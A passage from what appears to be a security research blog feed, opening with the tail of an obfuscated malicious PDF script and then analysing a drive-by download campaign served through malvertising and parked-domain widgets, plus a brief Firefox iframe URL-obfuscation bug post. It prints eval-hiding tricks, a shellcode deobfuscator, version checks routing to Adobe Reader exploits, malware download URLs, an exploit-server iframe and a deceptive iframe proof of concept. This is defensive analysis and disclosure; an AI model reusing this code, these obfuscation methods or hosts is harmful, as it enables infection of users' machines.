YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYYlYYYvYYY YYY>YYY=YYY YYY9YYY.YYY1YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY9YYY.YYY2YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY>YYY=YYY YYY8YYY.YYY1YYY3YYY)YYY YYY|YYY|YYY YYY(YYYlYYYvYYY YYY<YYY=YYY YYY8YYY.YYY1YYY7YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\n';th("var oesfeufxntyi = cwyuvaooeo.re"+"pla"+"ce(/[Y]/g,'');");/* avqjavi766743 = 60; <owzeuouz106118> */var ugyolugwu968354 = "_e75af8ac39f";/* vuyiua152184 = 76; <zriefda431629> */var iuoeonh343430 = "_21d716ac020";var evaiwueei264011 = "_7ed30974517";/* rlaoaya455073 = 95; <geaaoo654855> */var iuzxgj474859 = "_3046be797c0";var pewzyahmfb544339 = "_8bdfb70b60f";/* seiiaue71607 = 39; <unzoe856710> *//* yuydi485926 = 1; <dkykz871039> */var pgsinuunf = 100;/* hucrbdit453671 = 76; <nyyrrazqy740615> *//* namdkey949757 = 64; <yzdee833418> */var vuveioae876679 = "_0328e8fa935";/* iuoytl56881 = 46; <oiowiea705586> *//* ntpadaq590040 = 38; <ovkcjaka633301> */var gpyousxo = '';/* auomgyoed16943 = 82; <mumaa309375> */var xaeuhifje753328 = "_16533722a29";/* kmuiuayg202152 = 98; <asuuhlhy426995> *//* upcowvqa721683 = 3; <aydaeauo365685> */sauavlepu0 = oesfeufxntyi;var ayuyg642660 = "_15f35fef3a2";/* uedaeig772200 = 27; <oucyueo443122> *//* uyqota442513 = 52; <iyxuoa210597> *//* eyaye796590 = 43; <iaooywuv348521> */for(alookaaraaio=0;alookaaraaio<pgsinuunf;alookaaraaio++) {var vauiauyyfcfi = 'function a1106889858(fa) {return fa;} var a266415535 = 281772104;function a454936894(fa) {return fa;} var a289990746 = 1206395987;function a606709841(fa) {return fa;} var a814629542 = 809599932;function a975519308(fa) {return fa;} var a73837795 = 418139819;function a1311395772(fa) {return fa;} var a102714415 = 1168743178;function a457025328(fa) {return fa;} var a106369175 = 824445897;';var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var vauiauyyfcfi = vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi+vauiauyyfcfi;var dsfsg = alookaaraaio+1;gpyousxo = 'var sauavlepu'+dsfsg+'=sauavlepu'+alookaaraaio+';'+vauiauyyfcfi+''+vauiauyyfcfi+''+vauiauyyfcfi+'';th(gpyousxo);}th(sauavlepu100);var okyyyornb516688 = "_3ffdcb9f05e";var pquxtoa762840 = "_68a883464be";/* yryeie384069 = 97; <aeyoboeaa202244> */
//</ACRO_script>
//</Document-Actions>

The obfuscation was sophisticated, showing the involvement of heavy manual effort. The javascript code is encoded with ASCII85Decode.

First, the deobfuscation function:

function ghfsdj(adbhsdh)
{
var jfsd = "gas%ss2u";
return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
The shellcode snippets below are obfuscated with the function:

shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&C...");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC..");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589..");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CA..");

The deobfuscation function replaces && prefixes with %u. And then, an interesting trick is used to hide the use of the eval() function from pattern-based detection:

var ev = 'yeegsgvsssaglh';
..
this[ev.charAt (2) + ev.charAt (6) + ev.charAt (10) + ev.charAt (12)] ('var th = thi' + 's[\'ev\'+\'\'+\'al\'];');

The decoded javascript contains several pieces of exploit code for the different vulnerabilities below:

a) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()

b) Adobe Acrobat and Reader util.printf (CVE-2008-2992)

c) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)

d) Adobe Reader GetMailInfo (CVE-2007-5659)

The javascript below checks for a matching version of exploitable Adobe Reader and if found, triggers the corresponding exploit:

aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
{
if (aPlugins[i].name=="EScript")

{
var lv=aPlugins[i].version;
}
}
if ((lv==9)||((sv==8)&&(lv<=8.12)))
{

geticon();
}
else if (lv==7.1)
{
printf();
}
else if (((sv==6)||(sv==7))&&(lv<7.11))
{
collab();
}
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
nplayer();
}

Initial detection rate of this PDF was extremely low--2 out of 42 on VirusTotal. Got a little better now but not much.

Upon successful exploitation, shellcode is executed and the browser downloads and runs the following two executables:
1. file.exe (HDD Plus), from: http://colemuns.com/pupseg/forum.php?f=MDAC&key=92e93d0553cdb3c89d7d397457811f6d&u=root, Virus Total results here.
2. 461-direct.exe (backdoor), from: http://searchjewel.org/any5/461-direct.exe, Virus Total results here.

Note that the binaries, and the ways that they were obfuscated, kept on changing for the past few days.

Another installed malware is the Kazy downloader; see the VirusTotal report here.

Actually, the exploits themselves kept on changing, too. When we first detected this on Dec 3rd, it was serving only one exploit--CVE-2010-0806, and it wasn't from colemuns.com, but from thjlnqbtgdw.com and pbcplifpgdw.com. During this time, the NeoSploit exploit pack was used instead of the later Eleonore-like pack.

Part 2--rad.msn.com case study

Malvertising by ADShufffle on rad.msn.com started later than DoubleClick; however, the behavior is quite the same.

Upon visiting a website that is serving banners from rad.msn.com, for example mail.live.com, msnbc.com, or realestate.msn.com, the browser is presented with an ad tag for a 728x90 banner ad from rad.msn.com:

<script type="text/javascript" src="http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=REAB01&AP=1390" onreadystatechange="startTimer();"></script>

Here rad.msn.com throws out some obfuscated javascript, which decodes to:

<script type="text/javascript" src="http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=23444436&lpd=${REQUESTID}&ASTPCT=${CLICKURL}"><script>

Which causes the browser to load from adshufffle. The actual 728x90 banner ad, which is again, illegally copied, is http://media.topsann.com/bdb/aBigCommerce/728x90stat.gif:

And the rest is similar.

At Armorize we've been developing technologies to detect drive-by downloads starting in the 2000, with our first major publication released in 2003 at the WWW Conference. In 2007, we acquired X-Solve to pushed out our drive-by download detection service, HackAlert. Recently, we released a new version of HackAlert--HackAlert SafeImpression, which is geared towards malvertising detection and ease of use by the online media industry.
If you are interested in any information, please email us at wayne@armorize.com
Part 2 of the story: About HDD Plus spreading also through OpenX vulnerabilities, and a guy behind all this

Parked domain numbers and traffic, and more on the exploits served

2010-08-18T19:00:00.000-07:00

(by Wayne Huang of Armorize)
We received a number of questions on details of malicious parked domains incident, so let us give some clarifications on the questioned issues.

The scale and impact of incident.

We strongly believe that the number of potentially impacted users is high. There were some misunderstanding that the widget was serving only to Asian IPs. No, the widget was serving once per IP, to all IPs worldwide.

We studied two references to external components, which are rendered by browsers when a parked domain page is loaded. One component is loading a javascript snippet from asiappc.com and is only served to visitors coming from Taiwan or Hong Kong. Another component is loading a widget from a compromised system and is served to any visitor world-wide.

The first component (asian) includes a reference to a counter. Therefore we are can observe volume of traffic from asian IP addresses. The second component is loaded from a compromised system and serves malware via injected iframe once per each unique IP address. As of this moment we are not able to obtain any statistics on this component but we can infer and estimate the numbers using other known factors.

The affected platform
We briefly covered it in our part 1 post, the widget directs the browser to load content from the following exploit server:

...omitted...
<iframe frameborder=0 src="http://96.30.16.216:8037/exemple.com/" width=1 height=1 scrolling=no></iframe>

This URL is still active right now, and is serving Eleonore version 1.3.1:

Eleonore exploit pack (a bundle of exploits with some programmatic logic behind), as most browser exploit packs, tries to serve the "right" exploits to corresponding browsers. This particular version of the bundle targets vulnerabilities in following software: Adobe Reader, Java(cross-browsers), Internet Explorer, Firefox, and Opera. Below is the of included exploits (we'll update the post later to add hyperlinks for the above; sorry for now):

MDAC
MS009-02
ActiveX pack
CompareTo
JNO (JS navigator Object Code)
MS06-006
Font tags
Telnet
PDF collab.getIcon
PDF Util.Printf
PDF collab.collectEmailInfo
Java D&E
Soc pack (iframe ver)

Average infection rates are: 5-17% on North American traffic, and 10-25% on .ru traffic.

Now, the detailed explanation on number of domains and the impact:

The number of visits to these parked domains and actual traffic volume touches a sensitive topic--parked domain monetization. According to Wikipedia's definitions, "Domain parking may also refer to an advertising practice known as parked domain monetization,[1] used primarily by domain name registrars and Internet advertising publishers to monetize type-in traffic visiting a parked or minimally developed domain name.."

How much traffic, and hence money, does this strategy brings? Reference [1] in the above Wikipedia page pointed to ICANNWiki's "Domain Parking" definition:

quote:
"
According to a November 17, 2005 Wall Street Journal article, "revenue from text ads on these sites will total $400 million to $600 million world-wide this year and may reach $1 billion by 2007, according to Susquehanna Financial Group analysts Marianne Wolk and Roxane Previty, who track the online ad industry."
"

How many visitors do we need in order to generate this type of revenue from per-click ads? A lot.

The refered WJS article is available here. There are also other similar market reports. Another interesting number is mentioned here: CircleID: "According to Ram Mohan from Afilias, 3 of the big 5 registrars say that they make over $5m-$8m / year from parked domain monetization pages."

You can also find random forum posts by PPC "businessmen" who generate their revenue through parked domain services:register three digit impressions.

Nevertheless, it's long been a debate (for example here) on the legality of such business, or whether search engines should index parked domains, and if so, how many pages per parked domain should be indexed. In our last post, we provided this link, which showed that Yahoo Search indexes more than 5 million Network Solutions parked domains. Now, only after a few days, clicking on the same page shows only 6 results. If we enter the same search phrases into Bing, it's the same--6 results.

If we want to fight parked domain monetization (do we? should we?), not indexing these pages is definitely a good effort on the part of the search engines.

But the question remains--so what's the number??

We can use the following calculation approach:

Submit key terms to search engines to make the search engines dump out (only) the parked domains in the search results.
Sequentially click and analyze the returned URLs.

In our brief experiment, we identified more than a hundred parked domains, and with only 3 of the domains not serving malicious widget at the time of our initial report.

To validate, let's assume that there is only 1,000,000 of parked domains. And then let's assume that out of them only 120,000 were infected. Then the probability for us to click on an arbitrary search result and hit an infected page, would be 120,000 * 100 / 1,000,000 = 12%. This certainly wasn't the case as seen in the video we posted earlier.

Another approach:
The script served by asiappc.com on the default parking page is served only to visitors with IPs located in two geographic regions--Taiwan, and Hong Kong. That script pulls in a public Web analytics service--51.la. The account used does not require a password to view statistics. This analytics account was registered on Feb 5th of this year, and although it is serving to (and therefor recording) only IPs coming from Taiwan and Hong Kong, it still shows a number of 1187301 unique IP visits in total, with only 5316 visits today. This sheds light into just how much traffic the default parking page might be generating in total.

Let us illustrate this with a few screenshots. First screenshot shows that most visitors come from either Taiwan or Hong Kong. One of the server-sides scripts is responsible for determining this, and it of courses uses a different GeoIP database than the one used by the analytics service, and that's why you see that there are still 11% coming from the US--these 11% of IPs are believed to come from either Taiwan or China by the server-side script, but the analytics service believes they come from the US:

So, how many average page views per day? Let's look at the web analytics again. Note that this script is included in many other hosting companies' default parking pages:

According to the analytics, there is an average number of 14,073 page views per day.
According to InternetWorldStats.com, Taiwan and Hong Kong contributes to 2% and 0.6% of Asia's Internet population (China is 50.9%), respectively. Together they make 2.6% of Asia's traffic. Since Asia makes up 42% of the Internet population, Taiwan plus Hong Kong traffic make up 2.6% * 42% = 1.1% of all traffic to all the parking pages that include this particular script.

So 14,073 daily page views / 1.1% = 1,279,363 page views per day--over one million potential daily "parking" page views. Even if Network Solutions contribute to only 1/10th of the parking domains traffic, this is still 127,936 page views per day, that was served with malware, for a long period of time.

What's interesting here, is the fact that what seems to be very little traffic per domain, actually accumulates to a significant volume. If we take a look at the referer rankings, only the top 2 referers (parking pages) had three digit daily page views!

Furthermore, this is the total number of accumulative page views that was served with malware. Slashdot user noc007 commented about our research comments:
===============
"I thought this was a known fact Network Solutions' parked pages served malware in one form or another. Back in July of last year I got some questions from an executive why the domain the company recently registered for was being blocked by the corporate web content filter. Turns out the Network Solutions parked page had an iframe that was serving malware from kolmic.com. I explained it and provided the parked page's html code with the offending code highlighted.

Doing some Google searches showed that I wasn't the only one that had noticed this."
===============

Followed by The-Blue_Clown:
===============
"I had the same exact experience. The only issue was I had an exec that wasn't going to be pushed around by the IT guys. She ordered the filter relaxed. I only got my way when i told her i needed all such requests in writing as she was assuming the known risk i had just finished explaining to her."
===============

We also mentioned similar incidents in the past. In fact, we've seen the same infected widget on a parked domain back in May--we simply did not realize it was on all default parked pages.

The key difference from typical injection attacks that we've seen in the past, such as the recent Apple.com hit by mass SQK injection incident is that such injections are usually cleaned up very quickly.

For large websites, sometimes within a day.

In contrast to that, a persistent injection against a widget or an online ad script on "parked domains"--domains which all together can add up to more than a million page views per day--went unnoticed for for months.

So to conclude, this time we've learned:

1. Parked domains do draw significant traffic, and that's why there's the parked domain monetization business.
2. Since there's traffic, criminals will try to infect parked domains.
3. In this case study, although only two parked domains had three digit daily page views, the daily page view can be over one million. This is due to the sheer large number of parked domains.
4. Compared to another vector for mass spreading drive-by downloads--mass SQL injections, infecting parked domains can result in longer lifespan of the infection, and hence potentially larger accumulative traffic, and hence a potentially larger number of vinctims.
5. Compared with infecting high traffic domains, mass infecting a large number of parked domains may yield comparable or even better accumulative page views. The infection may have a longer life span.
6. Compared to mass SQL injections, compromising a hosting platform allows for much better control of when and what to serve, or not to serve. With a webshell, the attacker can decide to activate serving of malware any time, and also deactivate any time.
*. We note that infecting parked domains can be done via compromising hosting systems or widgets (like this case study), or via malvertising.

An interesting question is: if all parked domains together generate as much traffic as a major website, then which infection will live longer? When you visit a major website and your (good) antivirus alerts you of malware, you tend to want to look into it and perhaps also report it. That's why large websites rarely get away with the public knowing about their infections.

When you visit a parked domain and your antivirus alerts you, would you bother reporting it?

Regardless of the answer, the widget had significant traffic, and it was there serving Eleonore at least since may. That's what we learned this time.

Infections to high traffic domains may generate big news, but it may not be the primary contributor of botnet growth. With respect to drive-by downloads spreading malware, persistent growth of botnets come from the millions of infected pages on the Internet. The challenge lies in how to infect these pages, how to keep them infected, and how to keep security vendors from finding out. Once security vendors find out, patterns are added, antivirus alerts, infection rates drop, the infected domains are fixed, the exploit serving domains are taken down, and the means to spread malware ends. Mass SQL injections and attacks against high traffic domains, though can infect a large number of visitors initially, have a short tail because such efforts are likely to be spotted very quickly.

Infecting parking domains, as in this case study, provided the attackers with a means to still just use a single infection vector to infect a large number of domains, while at the same time, keep the public's attention low enough so the infection can have a very long life span, and hence high accumulative page views, and hence a large number of infections.

Every day, HackAlert continues to generate plenty of records of infected URLs, and we do look into those infected URLs whose Alexa scores are high. But our domain correction mechanism apparently isn't sophisticated enough to automatically alert us of a potential hosting provider compromise. That's why this time, our findings came from a manual investigation effort, which was initiated because we were strongly questioned by one of our clients on why we were flagging some parked pages. We should start to improve this.

Finally, based on the scope of this incident and the surrounding incidence response efforts, we were impressed with Network Solutions speed and honesty. We sent Shashi, their Blogger Relations Manager, a tweet, to which is responded very quickly. Later, by reading his tweets, we realized that he was on vacation (and it was on a weekend). He was on phone with us shortly, and a couple of hours later the widget was disabled. They made no attempt to hide the fact, and published a blog timely. Although we disagree on the number of infected domains, we felt they handled this particular incidence very well.

The beginning of year saw attacks increasing targeted at hosting companies; many of which fell prey and as a result, multiple hosted websites / blogs served malware for a period of time. Drive-by downloads can be massively spread via mass SQL injections, hosting platform compromises, widget infections, parked domain mass infections, LAN man-in-the-middle, and WAN man-in-the-middle. From our observation, the number of attempts to mass-spread drive-by downloads continues to rise. Web owners and hosting providers should be alerted, and also realize that a great deal can be learnt from past incidents.

IFrames and URL Stringency - Mozilla Firefox Bug

2010-08-16T20:39:00.000-07:00

Updated: A relative POC is released HERE

The inline frames play a crucial part in sharing and delivering third party content through them. But this is also a hardened fact that Iframes are used effectively by malware writers to spread infection across domains in a hidden manner. But the question is , Do browsers play significant role in this?

The URL obfuscation is a big stringency in the online world. Actually, it tests the browser efficiency to dissect the behavior of crafted URL. That has to be done. The browsers have shown a rogue behavior in determining the source and destination of URL's when it is obfuscated or fused with meta characters. This is dangerous from a user perspective because a victim can go to undesired destination. Well, lot of changes have been noticed in browser development with respect to that but in certain conditions , browsers still fail to find the authentic nature of URL's being rendered in the browser. A Google Chrome URL Obfuscation Vulnerability can be seen HERE

Further, a recent bug has been posed to BugZilla ID - 570658 regarding the behavior of IFrames and Frames handling the URL obfuscation. Firefox implements a notification alert to user when a obfuscated URL is used in the address bar as follows

On performing analysis of various malware, a bug has been noticed in all version of Firefox which fails to generate an alert when obfuscated URL is being placed in Iframes. In certain cases, it can be used effectively in spreading malware and stealing sensitive information. While discussions on BugZilla, it is noticed that Firefox behavior is completely different in these two scenarios which should not happen. The bug is in open state now. The major improvements can be seen in the following trunk

nsHttpChannel::ConfirmAuth()

A generic POC can be considered as

[iframe src="http://www.example.com@malware.com" width="600" height="600" /];

May be it is considered as a fact that frames are not shown directly but this is a bug by behavior. We can expect some changes in coming time regarding this falsified behavior.